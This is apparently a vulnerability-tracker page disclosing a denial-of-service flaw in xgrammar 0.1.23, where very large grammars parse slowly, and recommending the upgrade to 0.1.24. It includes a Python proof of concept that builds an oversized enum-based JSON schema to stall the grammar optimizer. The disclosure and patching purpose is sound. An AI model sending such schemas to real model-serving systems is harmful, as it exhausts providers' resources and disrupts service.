### Summary Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a...
Full analysis pending. Showing NVD description excerpt.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| xgrammar | pip | = 0.1.23 | 0.1.24 |
Do you use xgrammar? You're affected.
Severity & Risk
Recommended Action
Patch available
Update xgrammar to version 0.1.24
Compliance Impact
Compliance analysis pending. Sign in for full compliance mapping when available.
Technical Details
NVD Description
### Summary Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser. ### Details Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers. ### Patch This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. Thanks to @Seven-Streams ### PoC ``` import string import random def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ``` where: ``` def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance)) ``` ### Impact DOS